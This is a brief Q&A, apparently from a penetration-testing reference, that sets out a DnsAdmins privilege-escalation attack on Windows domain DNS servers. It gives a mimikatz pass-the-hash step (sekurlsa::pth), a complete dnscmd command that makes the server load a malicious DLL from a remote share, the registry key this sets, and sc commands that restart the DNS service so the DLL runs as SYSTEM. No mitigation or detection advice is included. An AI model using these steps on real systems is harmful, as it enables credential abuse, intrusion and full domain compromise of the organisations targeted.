How do you execute the exploit using dnscmd and mimikatz?

First, use mimikatz with Over Pass the Hash (sekurlsa::pth) to obtain a cmd process with the privileges of a DnsAdmins user. Then run: `dnscmd <DNS_Server_IP> /config /serverlevelplugindll \\share\path\malicious.dll`. This sets a registry key at HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll. Restart the DNS service (e.g., `sc \\server stop dns` and `sc \\server start dns`) to load the DLL with SYSTEM privileges. For obtaining DNS records beforehand, see Domain Penetration - Obtaining DNS Records.